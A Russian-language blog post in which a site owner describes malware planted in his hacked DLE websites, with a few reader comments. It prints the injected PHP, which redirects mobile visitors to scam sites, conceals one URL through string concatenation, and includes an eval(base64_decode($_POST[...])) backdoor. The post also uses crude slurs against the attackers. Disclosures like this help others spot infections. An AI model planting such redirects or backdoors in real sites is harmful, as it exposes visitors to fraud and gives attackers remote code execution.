Познавательный блог  

Поиск по сайту

Гугль

Архивы

Кто такие statuses.ws, ya-analytics.ws и getinternet.ws

Недавно на своих старых проектах я обнаружил заразу. Какой-то пидорас, нехороший человек, поломал движок DLE. И воткнул мне в код шаблонов и функция кучки кодов, которые перенаправляли людей пришедших ко мне с поисковых система на левые сайты с порнухой, вирусами и прочими радостями жизни.

Что интересно, основной интерес у них представляли юзеры мобильных девайсов, iPhone, Android, BlackBerry и пр.

Вот пример первого кода.

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yandex-google.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://ya-analytics.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

В данном случае перенаправление шло на statuses.ws и ya-analytics.ws.

Следующий педик

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") ||
strpos($_SERVER['HTTP_USER_AGENT'],"Android") ||
strpos($_SERVER['HTTP_USER_AGENT'],"webOS") ||
strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") ||
strpos($_SERVER['HTTP_USER_AGENT'],"iPod"))
header('Location: http://getinternet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

Отправлял людей на getinternet.ws.

А последний гнал трафик на up.cc.co.id/u/4590? по всей видимости какая-то траф партнерка.

if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."u"."p"."."."c"."c"."."."c"."o"."."."i"."d"."/"."u"."/"."4"."5"."9"."0");
die();}

На всех этих сайтах: statuses.ws, ya-analytics.ws и getinternet.ws предлагалось установить себе несуществующие обновления для любых браузеров, почиститься от вирусов, которых у вас нет и отправить куда-нибудь СМС. В общем обычные мошенники. Я был настолько расстроен, что мои сайты так дешево наебнули, что ушел от движка DLE и продал свои старые сайты к чертям собачьим.

Комментарии

Комментарий от byroot [ Апрель 9, 2013, 05:42 ]

обновлять DLE нужно было своевременно, тогда вероятность взлома сайтов резко уменьшается…

Комментарий от admin [ Апрель 9, 2013, 13:45 ]

Тюперь знаю :(

Комментарий от ufo [ Апрель 22, 2013, 23:42 ]

Да мне тоже какой-то ПИД… редиска такой-же код всунул в очень даже белый и малопосещаемый сайт только для своих. Лядь, прийдётся прощаться с DLE. гавно а не движок, немцы его изначально нормально сделали а наши потом только испоганили своими переделками и стали типа за это деньги брать. пошёл ка я на WordPress

Комментарий от admin [ Апрель 23, 2013, 16:58 ]

вордпресс сильно жирный. даже с кешем очень грузит сервер

Написать комментарий








Страницы

Свежие записи

Гугль

Мета

Счетчики


Rambler's Top100

Рубрики

  Разработка и дизайн — StvPromo.ru